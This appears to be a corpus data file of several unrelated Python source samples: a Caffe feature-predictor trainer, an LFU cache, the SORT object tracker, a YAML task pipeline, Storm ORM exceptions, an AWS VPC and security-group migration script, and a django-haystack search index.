def solve(self, solver, solver_param, visualize_response_maps=False):
# load losses for visualization
iters, losses, val_losses = self.restore_losses(curr_iter=solver.iter, num_test_nets=len(solver.test_nets))
# solver loop
for iter_ in range(solver.iter, solver_param.max_iter):
solver.step(1)
if iter_ % solver_param.display == 0:
iters.append(iter_)
# visualize response maps of first image in batch
if visualize_response_maps:
image_curr = solver.net.blobs['image_curr'].data[0].copy()
vel = solver.net.blobs['vel'].data[0].copy()
image_diff = solver.net.blobs['image_diff'].data[0].copy()
self.visualize_response_maps(image_curr, vel, x_next=image_curr+image_diff)
# training loss
loss = 0.0
for blob_name, loss_weight in solver.net.blob_loss_weights.items():
if loss_weight:
loss += loss_weight * solver.net.blobs[blob_name].data
losses.append(loss)
# validation loss
test_losses = []
for test_net, test_iter, test_losses in zip(solver.test_nets, solver_param.test_iter, val_losses):
test_scores = {}
for i in range(test_iter):
output_blobs = test_net.forward()
for blob_name, blob_data in output_blobs.items():
if i == 0:
test_scores[blob_name] = blob_data.copy()
else:
test_scores[blob_name] += blob_data
test_loss = 0.0
for blob_name, score in test_scores.items():
loss_weight = test_net.blob_loss_weights[blob_name]
mean_score = score / test_iter
if loss_weight:
test_loss += loss_weight * mean_score
test_losses.append(test_loss)
# save losses and visualize them
self.save_losses(iters, losses, val_losses)
def predict(self, *inputs, **kwargs):
if 'prediction_name' in kwargs and kwargs['prediction_name'] not in self.blobs:
kwargs['prediction_name'] = kwargs['prediction_name'].replace('image', 'x0')
return super(CaffeNetFeaturePredictor, self).predict(*inputs, **kwargs)
def jacobian_control(self, X, U):
return self.jacobian(self.inputs[1], X, U), self.feature_from_input(X)
def feature_from_input(self, X, input_name='image_curr', output_name='y'):
assert X.shape == self.x_shape or X.shape[1:] == self.x_shape
batch = X.shape != self.x_shape
if not batch:
X = X[None, :]
batch_size = len(X)
input_blobs = dict()
for input_ in self.inputs:
if input_ == input_name:
input_blobs[input_] = X
else:
input_blobs[input_] = np.zeros((batch_size,) + self.blob(input_).data.shape[1:])
outs = self.forward_all(blobs=[output_name], end=output_name, **input_blobs)
Y = outs[output_name]
if not batch:
Y = np.squeeze(Y, axis=0)
return Y
def preprocess_input(self, X):
if 'x0' in self.blobs:
return self.feature_from_input(X, output_name='x0')
else:
return X
def add_default_parameters(self, solver_param, val_net=True):
if not solver_param.train_net:
train_val_fname = self.get_model_fname('train_val')
solver_param.train_net = train_val_fname
if val_net:
if not solver_param.test_net:
train_val_fname = self.get_model_fname('train_val')
solver_param.test_net.append(train_val_fname)
if not solver_param.test_iter:
solver_param.test_iter.append(10)
else:
del solver_param.test_net[:]
del solver_param.test_iter[:]
if not solver_param.solver_type: solver_param.solver_type = pb2.SolverParameter.SGD
if not solver_param.test_interval: solver_param.test_interval = 1000
if not solver_param.base_lr: solver_param.base_lr = 0.05
if not solver_param.lr_policy: solver_param.lr_policy = "step"
if not solver_param.gamma: solver_param.gamma = 0.9
if not solver_param.stepsize: solver_param.stepsize = 1000
if not solver_param.display: solver_param.display = 20
if not solver_param.max_iter: solver_param.max_iter = 10000
if not solver_param.momentum: solver_param.momentum = 0.9
if not solver_param.momentum2: solver_param.momentum2 = 0.999
if not solver_param.weight_decay: solver_param.weight_decay = 0.0005
if not solver_param.snapshot: solver_param.snapshot = 1000
if not solver_param.snapshot_prefix:
snapshot_prefix = self.get_snapshot_prefix()
solver_param.snapshot_prefix = snapshot_prefix
# don't change solver_param.solver_mode
@staticmethod
def set_weight_fillers(params, weight_fillers):
if weight_fillers:
for param_name, fillers in weight_fillers.items():
param = params.get(param_name)
if param:
for blob, filler in zip(param, fillers):
blob.data[...] = filler
def get_model_fname(self, phase):
model_dir = self.get_model_dir()
fname = os.path.join(model_dir, phase + '.prototxt')
return fname
class BilinearNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, input_shapes, **kwargs):
super(BilinearNetFeaturePredictor, self).__init__(net_caffe.bilinear_net, input_shapes, **kwargs)
def jacobian_control(self, X, U):
if X.shape == self.x_shape:
y = self.feature_from_input(X)
y_dim, = y.shape
A = self.params.values()[0][0].data.reshape((y_dim, y_dim, -1))
B = self.params.values()[1][0].data
jac = np.einsum("kij,i->kj", A, y) + B
return jac, y
else:
jac, y = zip(*[self.jacobian_control(x, None) for x in X])
jac = np.asarray(jac)
y = np.asarray(y)
return jac, y
class FcnActionCondEncoderNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, *args, **kwargs):
super(FcnActionCondEncoderNetFeaturePredictor, self).__init__(*args, **kwargs)
self._xlevel_shapes = None
def mean_feature_from_input(self, X):
if X.shape == self.x_shape:
levels = []
for key in self.blobs.keys():
match = re.match('bilinear(\d+)_re_y$', key)
if match:
assert len(match.groups()) == 1
levels.append(int(match.group(1)))
levels = sorted(levels)
zlevels = []
for level in levels:
output_name = 'x%d'%level
if output_name == 'x0' and output_name not in self.blobs:
xlevel = X
else:
xlevel = self.feature_from_input(X, output_name=output_name)
zlevel = np.asarray([channel.mean() for channel in xlevel])
zlevels.append(zlevel)
z = np.concatenate(zlevels)
return z
else:
return np.asarray([self.mean_feature_from_input(x) for x in X])
def response_maps_from_input(self, x):
assert x.shape == self.x_shape
is_first_time = self._xlevel_shapes is None
if is_first_time:
levels = []
for key in self.blobs.keys():
match = re.match('bilinear(\d+)_re_y$', key)
if match:
assert len(match.groups()) == 1
levels.append(int(match.group(1)))
levels = sorted(levels)
xlevels_first = OrderedDict()
self._xlevel_shapes = OrderedDict()
for level in levels:
output_name = 'x%d'%level
if output_name == 'x0' and output_name not in self.blobs:
xlevel = x
else:
xlevel = self.feature_from_input(x, output_name=output_name)
xlevels_first[output_name] = xlevel
self._xlevel_shapes[output_name] = xlevel.shape
y = self.feature_from_input(x)
xlevels = OrderedDict()
y_index = 0
for output_name, shape in self._xlevel_shapes.items():
xlevels[output_name] = y[y_index:y_index+np.prod(shape)].reshape(shape)
y_index += np.prod(shape)
if is_first_time:
for xlevel, xlevel_first in zip(xlevels.values(), xlevels_first.values()):
assert np.allclose(xlevel_first, xlevel)
return xlevels
def jacobian_control(self, X, U):
if X.shape == self.x_shape:
xlevels = self.response_maps_from_input(X)
jaclevels = []
ylevels = []
for output_name, xlevel in xlevels.items():
level = int(output_name[1:])
xlevel_c_dim = xlevel.shape[0]
y_dim = np.prod(xlevel.shape[1:])
u_dim, = self.u_shape
if 'bilinear%d_bilinear_yu'%level in self.params: # shared weights
A = self.params['bilinear%d_bilinear_yu'%level][0].data.reshape((y_dim, u_dim, y_dim))
jaclevel = np.einsum("kji,ci->ckj", A, xlevel.reshape((xlevel_c_dim, y_dim)))
else:
A = np.asarray([self.params['bilinear%d_bilinear_yu_%d'%(level, channel)][0].data for channel in range(xlevel_c_dim)]).reshape((xlevel_c_dim, y_dim, u_dim, y_dim))
jaclevel = np.einsum("ckji,ci->ckj", A, xlevel.reshape((xlevel_c_dim, y_dim)))
if 'bilinear%d_linear_u'%level in self.params: # shared weights
B = self.params['bilinear%d_linear_u'%level][0].data
c = self.params['bilinear%d_linear_u'%level][1].data
else:
B = np.asarray([self.params['bilinear%d_linear_u_%d'%(level, channel)][0].data for channel in range(xlevel_c_dim)])
c = np.asarray([self.params['bilinear%d_linear_u_%d'%(level, channel)][1].data for channel in range(xlevel_c_dim)])
jaclevel += B + c[..., None]
jaclevel = jaclevel.reshape(xlevel_c_dim * y_dim, u_dim)
jaclevels.append(jaclevel)
ylevels.append(xlevel.flatten())
jac = np.concatenate(jaclevels)
y = np.concatenate(ylevels)
return jac, y
else:
jac, y = zip(*[self.jacobian_control(x, None) for x in X])
jac = np.asarray(jac)
y = np.asarray(y)
return jac, y
class EnsembleNetFeaturePredictor(CaffeNetFeaturePredictor):
def __init__(self, predictors):
self.predictors = predictors
# use name of first predictor
self.net_name = 'ensemble_' + self.predictors[0].net_name
self.postfix = 'ensemble_' + self.predictors[0].postfix
def predict(self, *inputs, **kwargs):
predictions = []
for predictor in self.predictors:
prediction = predictor.predict(*inputs, **kwargs)
predictions.append(prediction)
predictions = np.concatenate(predictions, axis=1)
return predictions
def preprocess_input(self, X):
outs = []
for predictor in self.predictors:
out = predictor.preprocess_input(X)
outs.append(out)
outs = np.concatenate(outs, axis=1)
return outs
def mean_feature_from_input(self, X):
zs = []
for predictor in self.predictors:
z = predictor.mean_feature_from_input(X)
zs.append(z)
zs = np.concatenate(zs)
return zs
def feature_from_input(self, x):
ys = []
for predictor in self.predictors:
y = predictor.feature_from_input(x)
ys.append(y)
ys = np.concatenate(ys)
return ys
def response_maps_from_input(self, x):
xlevels = OrderedDict()
for i, predictor in enumerate(self.predictors):
predictor_xlevels = predictor.response_maps_from_input(x)
for output_name, xlevel in predictor_xlevels:
if output_name == 'x0' and output_name not in xlevels:
xlevels[output_name] = xlevel
else:
xlevels[output_name + '_%d'%i] = xlevel
return xlevels
def jacobian_control(self, X, U):
jacs = []
ys = []
for predictor in self.predictors:
jac, y = predictor.jacobian_control(X, U)
jacs.append(jac)
ys.append(y)
jacs = np.concatenate(jacs, axis=0)
ys = np.concatenate(ys, axis=0)
return jacs, ys
def train(self, *args, **kwargs):
raise NotImplementedError
|
StarcoderdataPython
|
11257994
|
class Node:
def __init__(self, key, val):
self.key = key
self.val = val
self.freq = 1
self.next = None
self.pre = None
class Dll:
def __init__(self):
self.head = Node(-1,-1)
self.tail = Node(-1,-1)
self.head.next = self.tail
self.tail.pre = self.head
self.count = 0
def insertToHead(self, node):
node.pre = self.head
node.next = self.head.next
self.head.next.pre = node
self.head.next = node
self.count += 1
def remove(self, node):
pre, nxt = node.pre, node.next
pre.next = nxt
nxt.pre = pre
self.count -= 1
def removeLast(self):
if self.count == 0:
return
last = self.tail.pre
self.remove(last)
return last
class LFUCache:
def __init__(self, capacity: int):
self.size = 0
self.cap = capacity
self.dic = {}
self.freq_dic = collections.defaultdict(Dll)
self.min_freq = 0
def update(self, node):
freq = node.freq
self.freq_dic[freq].remove(node)
if self.min_freq == freq and self.freq_dic[freq].count == 0:
self.min_freq += 1
node.freq += 1
self.freq_dic[node.freq].insertToHead(node)
def get(self, key: int) -> int:
if key in self.dic:
node = self.dic[key]
self.update(node)
return node.val
return -1
def put(self, key: int, value: int) -> None:
if self.cap == 0:
return
if key not in self.dic:
if self.size == self.cap:
node = self.freq_dic[self.min_freq].removeLast()
del self.dic[node.key]
self.size -= 1
node = Node(key, value)
self.dic[key] = node
self.freq_dic[1].insertToHead(node)
self.min_freq = 1
self.size += 1
else:
node = self.dic[key]
self.update(node)
node.val = value
|
StarcoderdataPython
|
143504
|
<filename>chapter10/sort.py
"""
SORT: A Simple, Online and Realtime Tracker
Copyright (C) 2016 <NAME> <EMAIL>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
from scipy.optimize import linear_sum_assignment
from typing import Tuple
import cv2
def convert_bbox_to_z(bbox):
"""
Takes a bounding box in the form [x1,y1,x2,y2] and returns z in the form
[x,y,s,r] where x,y is the centre of the box and s is the scale/area and r is
the aspect ratio
"""
w, h = bbox[2:4] - bbox[0:2]
x, y = (bbox[0:2] + bbox[2:4]) / 2
s = w * h # scale is just area
r = w / h
return np.array([x, y, s, r])[:, None].astype(np.float64)
def convert_x_to_bbox(x):
"""
Takes a bounding box in the centre form [x,y,s,r] and returns it in the form
[x1,y1,x2,y2] where x1,y1 is the top left and x2,y2 is the bottom right
"""
# Shape of x is (7, 1)
x = x[:, 0]
center = x[0:2]
w = np.sqrt(x[2] * x[3])
h = x[2] / w
half_size = np.array([w, h]) / 2
bbox = np.concatenate((center - half_size, center + half_size))
return bbox.astype(np.float64)
class KalmanBoxTracker:
"""
This class represents the internel state of individual tracked objects observed as bbox.
"""
def __init__(self, bbox, label):
self.id = label
self.time_since_update = 0
self.hit_streak = 0
self.kf = cv2.KalmanFilter(dynamParams=7, measureParams=4, type=cv2.CV_64F)
# define constant velocity model
self.kf.transitionMatrix = np.array(
[[1, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=np.float64)
self.kf.processNoiseCov = np.diag([10, 10, 10, 10, 1e4, 1e4, 1e4]).astype(np.float64)
# We only observe
self.kf.measurementMatrix = np.array(
[[1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], dtype=np.float64)
self.kf.measurementNoiseCov = np.diag([1, 1, 10, 10]).astype(np.float64)
# Start the particle at their initial position with 0 velocities.
self.kf.statePost = np.vstack((convert_bbox_to_z(bbox), [[0], [0], [0]]))
self.kf.errorCovPost = np.diag([1, 1, 1, 1, 1e-2, 1e-2, 1e-4]).astype(np.float64)
def update(self, bbox):
"""
Updates the state vector with observed bbox.
"""
self.time_since_update = 0
self.hit_streak += 1
self.kf.correct(convert_bbox_to_z(bbox))
def predict(self):
"""
Advances the state vector and returns the predicted bounding box estimate.
"""
if self.time_since_update > 0:
self.hit_streak = 0
self.time_since_update += 1
retval = self.kf.predict()
return convert_x_to_bbox(retval)
@property
def current_state(self):
"""
Returns the current bounding box estimate.
"""
return convert_x_to_bbox(self.kf.statePost)
def iou(a: np.ndarray, b: np.ndarray) -> float:
"""
Computes IUO between two bboxes in the form [x1,y1,x2,y2]
"""
a_tl, a_br = a[:4].reshape((2, 2))
b_tl, b_br = b[:4].reshape((2, 2))
int_tl = np.maximum(a_tl, b_tl)
int_br = np.minimum(a_br, b_br)
int_area = np.product(np.maximum(0., int_br - int_tl))
a_area = np.product(a_br - a_tl)
b_area = np.product(b_br - b_tl)
return int_area / (a_area + b_area - int_area)
def associate_detections_to_trackers(detections: np.ndarray, trackers: np.ndarray,
iou_threshold: float = 0.3) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Assigns detections to tracked object (both represented as bounding boxes)
Returns 3 lists of matches, unmatched_detections and unmatched_trackers
"""
iou_matrix = np.zeros((len(detections), len(trackers)), dtype=np.float64)
for d, det in enumerate(detections):
for t, trk in enumerate(trackers):
iou_matrix[d, t] = iou(det, trk)
row_ind, col_ind = linear_sum_assignment(-iou_matrix)
matched_indices = np.transpose(np.array([row_ind, col_ind]))
iou_values = np.array([iou_matrix[detection, tracker]
for detection, tracker in matched_indices])
good_matches = matched_indices[iou_values > 0.3]
unmatched_detections = np.array(
[i for i in range(len(detections)) if i not in good_matches[:, 0]])
unmatched_trackers = np.array(
[i for i in range(len(trackers)) if i not in good_matches[:, 1]])
return good_matches, unmatched_detections, unmatched_trackers
class Sort:
def __init__(self, max_age=10, min_hits=6):
"""
Sets key parameters for SORT
"""
self.max_age = max_age
self.min_hits = min_hits
self.trackers = []
self.count = 0
def next_id(self):
self.count += 1
return self.count
def update(self, dets):
"""
Params:
dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]
Requires: this method must be called once for each frame even with empty detections.
Returns the a similar array, where the last column is the object ID.
NOTE: The number of objects returned may differ from the number of detections provided.
"""
# Predict new locations and remove trakcers with nans.
self.trackers = [
tracker for tracker in self.trackers if not np.any(
np.isnan(
tracker.predict()))]
# get predicted locations
trks = np.array([tracker.current_state for tracker in self.trackers])
matched, unmatched_dets, unmatched_trks = associate_detections_to_trackers(
dets, trks)
# update matched trackers with assigned detections
for detection_num, tracker_num in matched:
self.trackers[tracker_num].update(dets[detection_num])
# create and initialise new trackers for unmatched detections
for i in unmatched_dets:
self.trackers.append(KalmanBoxTracker(dets[i, :], self.next_id()))
ret = np.array([np.concatenate((trk.current_state, [trk.id + 1]))
for trk in self.trackers
if trk.time_since_update < 1 and trk.hit_streak >= self.min_hits])
# remove dead tracklet
self.trackers = [
tracker for tracker in self.trackers if tracker.time_since_update <= self.max_age]
return ret
|
StarcoderdataPython
|
232988
|
<reponame>ShayHa/CodingInterviewSolution
"""
The trick here is that I am using the new_ls parameter as a list to append.
Since this list is created on first call to the function it is the same object that
I append to.
"""
def rc(ls, new_ls=[]):
for x in ls:
if isinstance(x, list):
rc(x, new_ls)
else:
new_ls.append(x)
return new_ls
|
StarcoderdataPython
|
264580
|
<gh_stars>1-10
import copy
from pathlib import Path
import jinja2
from pipeline._yaml import read_yaml
from pipeline.exceptions import DuplicatedTaskError
def process_tasks(config):
user_defined_tasks = _collect_user_defined_tasks(config)
tasks = _add_default_output_path(user_defined_tasks, config)
tasks = _replace_task_dependencies_with_task_outputs(tasks)
return tasks
def replace_missing_templates_with_correct_paths(tasks, missing_templates):
for id_ in tasks:
if tasks[id_]["template"] in missing_templates:
tasks[id_]["template"] = missing_templates[tasks[id_]["template"]]
return tasks
def _collect_user_defined_tasks(config):
"""Collect the tasks.
Search recursively through the directories inside the project root and collect
.yamls
"""
task_files = list(Path(config["source_directory"]).glob("**/*.yaml"))
tasks = {}
for path in task_files:
try:
template = jinja2.Template(path.read_text())
except jinja2.exceptions.TemplateSyntaxError as e:
message = (
f"\n\nAn error happened while rendering the task template {path}. "
"This happens because a jinja2 variable within the template is not "
"defined, misspelled, etc.."
)
raise Exception(message) from e
rendered_template = template.render(**config)
tasks_in_file = read_yaml(rendered_template)
if tasks_in_file:
# Add config location to task_info.
for id_ in tasks_in_file:
tasks_in_file[id_]["config"] = path.as_posix()
duplicated_ids = set(tasks_in_file) & set(tasks)
if duplicated_ids:
raise DuplicatedTaskError(duplicated_ids)
tasks.update(tasks_in_file)
return tasks
def _add_default_output_path(user_defined_tasks, config):
user_defined_tasks = copy.deepcopy(user_defined_tasks)
generated_tasks = {}
for id_, task_info in user_defined_tasks.items():
if "produces" not in task_info:
task_info["produces"] = f"{config['hidden_build_directory']}/{id_}"
generated_tasks.update({id_: task_info})
return generated_tasks
def _replace_task_dependencies_with_task_outputs(tasks):
"""Replace a task dependency with the output of the task.
Since users are allowed to reference tasks as dependencies, we need to replace tasks
with the outputs of the task to form the workflow.
"""
for task_info in tasks.values():
depends_on = task_info.get("depends_on", [])
if isinstance(depends_on, list):
for i, dependency in enumerate(depends_on):
if dependency in tasks:
task_info["depends_on"][i] = tasks[dependency]["produces"]
else:
if depends_on in tasks:
task_info["depends_on"] = tasks[depends_on]["produces"]
return tasks
|
StarcoderdataPython
|
11643
|
import setuptools
setuptools.setup(
name="qualityforward",
version="1.1",
author="<NAME>",
author_email="<EMAIL>",
description="Python library for QualityForward API",
long_description="This is python library for QualityForward API. QualityForward is cloud based test management service.",
long_description_content_type="text/markdown",
url="https://cloud.veriserve.co.jp/",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
]
)
|
StarcoderdataPython
|
11397438
|
#
# Copyright (c) 2006, 2007 Canonical
#
# Written by <NAME> <<EMAIL>>
#
# This file is part of Storm Object Relational Mapper.
#
# Storm is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of
# the License, or (at your option) any later version.
#
# Storm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
class StormError(Exception):
pass
class CompileError(StormError):
pass
class NoTableError(CompileError):
pass
class ExprError(StormError):
pass
class NoneError(StormError):
pass
class PropertyPathError(StormError):
pass
class ClassInfoError(StormError):
pass
class URIError(StormError):
pass
class ClosedError(StormError):
pass
class FeatureError(StormError):
pass
class DatabaseModuleError(StormError):
pass
class StoreError(StormError):
pass
class NoStoreError(StormError):
pass
class WrongStoreError(StoreError):
pass
class NotFlushedError(StoreError):
pass
class OrderLoopError(StoreError):
pass
class NotOneError(StoreError):
pass
class UnorderedError(StoreError):
pass
class LostObjectError(StoreError):
pass
class Error(StormError):
pass
class Warning(StormError):
pass
class InterfaceError(Error):
pass
class DatabaseError(Error):
pass
class InternalError(DatabaseError):
pass
class OperationalError(DatabaseError):
pass
class ProgrammingError(DatabaseError):
pass
class IntegrityError(DatabaseError):
pass
class DataError(DatabaseError):
pass
class NotSupportedError(DatabaseError):
pass
class DisconnectionError(OperationalError):
pass
class TimeoutError(StormError):
"""Raised by timeout tracers when remining time is over."""
def __init__(self, statement, params, message=None):
self.statement = statement
self.params = params
self.message = message
def __str__(self):
return ', '.join(
[repr(element) for element in
(self.message, self.statement, self.params)
if element is not None])
class ConnectionBlockedError(StormError):
"""Raised when an attempt is made to use a blocked connection."""
def install_exceptions(module):
for exception in (Error, Warning, DatabaseError, InternalError,
OperationalError, ProgrammingError, IntegrityError,
DataError, NotSupportedError, InterfaceError):
module_exception = getattr(module, exception.__name__, None)
if module_exception is not None:
module_exception.__bases__ += (exception,)
|
StarcoderdataPython
|
4932778
|
#!/usr/bin/python
# -*- coding: utf8 -*-
import boto3
from botocore.exceptions import ClientError
import json
import sys
from utils import *
target_region_name='cn-northwest-1'
# 用于记录源数据到目标数据的ID转换, 例如 subnet_id, sg_id
transform_map = {
'region': { 'from':'cn-north-1', 'to':'cn-northwest-1'},
'vpc':{},
'subnet':{},
'security_group':{}
}
session = boto3.Session(profile_name=sys.argv[1])
client = session.client('ec2', region_name=transform_map['region']['to'])
ec2 = session.resource('ec2', region_name=target_region_name)
'''
settings2=json.load(open("vpcs_subnets.json"))
settings3=json.load(open("sg_groups.json"))
vpcdict={}
for v in settings1['Vpcs']:
vpcdict[v['VpcId']]=client.create_vpc(CidrBlock=v['CidrBlock'])['Vpc']['VpcId']
vpc = ec2.Vpc(vpcdict[v['VpcId']])
if 'Tags' in v:
vpc.create_tags(Tags=v['Tags'])
vpc.load()
subnetdict={}
for n in settings2['Subnets']:
subnetdict[n['SubnetId']]=client.create_subnet(AvailabilityZone=n['AvailabilityZone'].replace('north','northwest'),CidrBlock=n['CidrBlock'],VpcId=vpcdict[n['VpcId']])['Subnet']['SubnetId']
subnet = ec2.Subnet(subnetdict[n['SubnetId']])
if 'Tags' in n:
subnet.create_tags(Tags=n['Tags'])
subnet.load()
groupdict={}
for s in settings3['SecurityGroups']:
if not (s['GroupName'] == 'default' or s['GroupName'].startswith('launch-wizard')):
if s['VpcId'] in vpcdict:
groupdict[s['GroupId']]=client.create_security_group(Description=s['Description'],GroupName=s['GroupName'],VpcId=vpcdict[s['VpcId']])['GroupId']
security_group = ec2.SecurityGroup(groupdict[s['GroupId']])
security_group.authorize_ingress(IpPermissions=s['IpPermissions'])
FPermissions=[]
for q in s['IpPermissionsEgress']:
if not (q['IpProtocol']=='-1'):
FPermissions.append(q)
if not len(FPermissions)==0:
security_group.authorize_egress(IpPermissions=FPermissions)
if 'Tags' in s:
security_group.create_tags(Tags=s['Tags'])
security_group.load()
settings4=json.load(open("ec2_list.json"))
amilist=json.load(open("ami.json"))
newlist=[]
for i in amilist:
newlist.append({'ImageId':client.copy_image(Name=i['ImageName'],SourceImageId=i['ImageId'],SourceRegion='cn-north-1')['ImageId'],'ImageName':i['ImageName']})
imagedict={}
for i in newlist:
imagedict[i['ImageName']]=i['ImageId']
for i in settings4['Reservations']:
for ii in i['Instances']:
for iii in ii['SecurityGroups']:
SGIds=[]
if iii['GroupId'] in groupdict:
SGIds.append(groupdict[iii['GroupId']])
if not len(SGIds)==0:
ec2.create_instances(MaxCount=1,MinCount=1,ImageId=imagedict[ii['InstanceId']],InstanceType=ii['InstanceType'],SecurityGroupIds=SGIds,SubnetId=subnetdict[ii['SubnetId']],PrivateIpAddress=ii['PrivateIpAddress'])
'''
def print_tags(tag_list):
tag_str='Tags( '
for tag in tag_list:
tag_str += '{key}/{value} '.format(key=tag['Key'], value=tag['Value'])
tag_str += ')'
return tag_str
def import_vpcs():
vpcs=json.load(open("vpcs_export.json"))
for vpc in vpcs['Vpcs']:
if 'Tags' not in vpc:
vpc['Tags'] = [
{
'Key': 'Name',
'Value': ''
}
]
print('{cidr} {tags} IsDefault({IsDefault})'.format(cidr=vpc['CidrBlock'], tags=print_tags(vpc['Tags']), IsDefault=vpc['IsDefault']))
def import_subnets():
subnets = load_json_from_file('vpcs_subnets.json')
for subnet in subnets['Subnets']:
if 'Tags' not in subnet:
subnet['Tags'] = [
{
'Key': 'Name',
'Value': ''
}
]
print('{az} {cidr} {tags})'.format(az=subnet['AvailabilityZone'], cidr=subnet['CidrBlock'], tags=print_tags(subnet['Tags'])))
if subnet['VpcId'] not in transform_map['vpc'].keys():
continue
response = client.create_subnet(
AvailabilityZone=subnet['AvailabilityZone'].replace(transform_map['region']['from'], transform_map['region']['to']),
CidrBlock=subnet['CidrBlock'],
VpcId=transform_map['vpc'][subnet['VpcId']],
DryRun=False
)
#print(response)
# Adding tags
dst_subnet_id = response['Subnet']['SubnetId']
new_subnet = ec2.Subnet(dst_subnet_id)
tag = new_subnet.create_tags(
Tags=subnet['Tags']
)
transform_map['subnet'][subnet['SubnetId']] = dst_subnet_id
write_json_to_file('transform.json', transform_map)
#print(tag)
def tranform_IpPermissions(permissions):
transformed_list=[]
for permission in permissions:
group_list=[]
if 'UserIdGroupPairs' in permission:
for group in permission['UserIdGroupPairs']:
print group
print transform_map['security_group'][group['GroupId']]
group_list.append({
'GroupId': transform_map['security_group'][group['GroupId']],
'UserId': transform_map['account']['to']
}
)
permission['UserIdGroupPairs']=group_list
transformed_list.append(permission)
print transformed_list
return transformed_list
def import_sg(Type='Group'):
sg_groups = load_json_from_file('sg_groups.json')
for sg_group in sg_groups['SecurityGroups']:
if sg_group['VpcId'] not in transform_map['vpc'].keys():
continue
if sg_group['GroupName'] == 'default':
continue
if Type == 'Group':
response = client.create_security_group(
Description=sg_group['Description'],
GroupName=sg_group['GroupName'],
VpcId=transform_map['vpc'][sg_group['VpcId']]
)
print(response)
sg_id = response['GroupId']
transform_map['security_group'][sg_group['GroupId']] = sg_id
print(sg_id)
# Adding tags
security_group = ec2.SecurityGroup(sg_id)
if 'Tags' in sg_group:
tag = security_group.create_tags(
Tags=sg_group['Tags']
)
print(tag)
elif Type == 'Rule':
# Adding Ingress/Egress rules
# TODO: Src ... sg mapping
security_group = ec2.SecurityGroup(transform_map['security_group'][sg_group['GroupId']])
response = security_group.authorize_ingress(
IpPermissions=tranform_IpPermissions(sg_group['IpPermissions'])
)
## TODO: Skip just here, later will clear the egress
#response = security_group.authorize_egress(
#IpPermissions=sg_group['IpPermissionsEgress']
#)
write_json_to_file('transform.json', transform_map)
if __name__ == '__main__':
transform_map = load_json_from_file('transform.json')
import_vpcs()
import_subnets()
import_sg(Type='Group')
import_sg(Type='Rule')
write_json_to_file('transform.json', transform_map)
|
StarcoderdataPython
|
11222304
|
<gh_stars>0
from haystack import indexes
from library.models import Item, CaseBrief, SynthesisItem, Synthesis, CollectionTag
name_boost = 1.25
class LibraryCommonIndexPropertiesMixin(object):
belongs_to = indexes.CharField()
# class ItemIndex(indexes.SearchIndex): # this would disable indexing for this index class.
class ItemIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Item Index - I originally hoped this would be a NON-indexed Index class which is then subclassed into
apps' index classes and made indexable there so facilitate restricting to app-level access. Not sure what the
future holds for that concept though.
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
"indexes.Indexable" - tells django-haystack to index that material. Without
it the index is ignored.
Note on assets:
- I think we can leave the secureasset index largely in place - BUT in the index_queryset
method we should restrict the selection to secureassets that are part of Library ie: they have
an entry in ItemAsset relation.
Tags:
http://django-haystack.readthedocs.io/en/v2.4.1/searchindex_api.html#prepare-self-object
'''
def get_model(self):
return Item
'''
Item index document :
'''
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/item_text.txt'
'''
Item Fields
'''
name = indexes.CharField(null=False, model_attr='name', boost=name_boost)
tags = indexes.FacetMultiValueField()
collections = indexes.FacetMultiValueField()
cataloger = indexes.CharField(model_attr='cataloger', null=True)
reviewer = indexes.CharField(model_attr='reviewer', null=True)
prefixed_id = indexes.CharField(model_attr='prefixed_id')
file_names = indexes.FacetMultiValueField()
'''
DublinCore Fields
'''
item_type = indexes.FacetCharField(null=True, model_attr='dublin_core__type')
contributor = indexes.FacetCharField(null=True, model_attr='dublin_core__contributor')
coverage = indexes.FacetCharField(null=True, model_attr='dublin_core__coverage')
creator = indexes.FacetCharField(null=True, model_attr='dublin_core__creator')
date = indexes.FacetDateField(null=True, model_attr='dublin_core__date')
description = indexes.CharField(null=True, model_attr='dublin_core__description')
format = indexes.CharField(null=True, model_attr='dublin_core__format')
identifier = indexes.CharField(null=True, model_attr='dublin_core__identifier')
language = indexes.FacetCharField(null=True, model_attr='dublin_core__language')
publisher = indexes.CharField(null=True, model_attr='dublin_core__publisher')
relation = indexes.CharField(null=True, model_attr='dublin_core__relation')
rights = indexes.CharField(null=True, model_attr='dublin_core__rights')
source = indexes.CharField(null=True, model_attr='dublin_core__source')
subject = indexes.CharField(null=True, model_attr='dublin_core__subject')
'''
Holdings Fields
'''
item_type_comments = indexes.CharField(null=True, model_attr='holdings__item_type_comments')
source_type = indexes.FacetCharField(null=True, model_attr='holdings__source_type')
media_mode = indexes.FacetCharField(null=True, model_attr='holdings__media_mode')
